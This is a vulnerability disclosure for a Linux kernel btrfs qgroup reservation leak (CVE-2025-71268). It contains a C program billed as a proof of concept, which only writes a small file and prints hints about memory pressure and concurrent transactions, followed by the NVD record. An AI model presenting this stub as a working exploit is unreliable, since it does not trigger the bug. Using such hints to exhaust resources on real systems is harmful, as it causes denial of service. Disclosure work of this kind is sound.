CVE-2025-71268

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/stat.h> /* * PoC for CVE-2025-71268: btrfs qgroup reservation leak * This PoC demonstrates triggering the resource leak condition * by creating conditions that cause __cow_file_range_inline() * to fail during path allocation or transaction join. * * Note: This requires a btrfs filesystem and specific conditions * to trigger the vulnerable code path. */ #define TEST_FILE "/mnt/btrfs_test/file.dat" #define SMALL_DATA_SIZE 100 // Small data that uses inline extent int main() { int fd; char data[SMALL_DATA_SIZE]; struct stat st; memset(data, 'A', SMALL_DATA_SIZE); printf("CVE-2025-71268 PoC - btrfs qgroup reservation leak\n"); printf("=================================================\n\n"); // Create test directory and file mkdir("/mnt/btrfs_test", 0755); // Open file for writing (truncate if exists) fd = open(TEST_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0644); if (fd < 0) { perror("Failed to open file"); return 1; } printf("Writing small data to trigger inline extent...\n"); // Write small data that may use inline extent if (write(fd, data, SMALL_DATA_SIZE) != SMALL_DATA_SIZE) { perror("Write failed"); close(fd); return 1; } // Close file to flush data close(fd); printf("Initial write completed.\n"); printf("To trigger vulnerability, create conditions for:\n"); printf(" 1. Path allocation failure (memory pressure)\n"); printf(" 2. Transaction join failure (concurrent operations)\n"); printf("\nMonitor qgroup reservations: btrfs qgroup show /mnt/btrfs_test\n"); return 0; }

{"cve": {"id": "CVE-2025-71268", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T18:16:21.960", "lastModified": "2026-05-21T18:39:30.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix reservation leak in some error paths when inserting inline extent\n\nIf we fail to allocate a path or join a transaction, we return from\n__cow_file_range_inline() without freeing the reserved qgroup data,\nresulting in a leak. Fix this by ensuring we call btrfs_qgroup_free_data()\nin such cases."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nbtrfs: corrige una fuga de reserva en algunas rutas de error al insertar una extensión en línea\n\nSi no logramos asignar una ruta o unirnos a una transacción, regresamos de __cow_file_range_inline() sin liberar los datos de qgroup reservados, lo que resulta en una fuga. Soluciona esto asegurando que llamamos a btrfs_qgroup_free_data() en tales casos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4", "versionEndExcluding": "6.1.163", "matchCriteriaId": "C030C978-094A-4182-8316-23BD86BEAF8A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.124", "matchCriteriaId": "76183B9F-CABE-4E21-A3E3-F0EBF99DC3C7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.70", "matchCriteriaId": "F3791390-0628-4808-99EF-1ED8ABF60933"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.10", "matchCriteriaId": "7156C23F-009E-4D05-838C-A2DA417B5B8D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/28768bd3abf9995a93f6e01bfce01c60622964dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/28b97fcbbf523779688e8de5fe55bf2dae3859f6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c1c050f92d8f6aac4e17f7f2230160794fceef0c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f3ee1732851aec6fe6b2cec2ef1b32d4e71d9913", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f7156512c8166d385f574b9ec030479aa7b1e8c9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}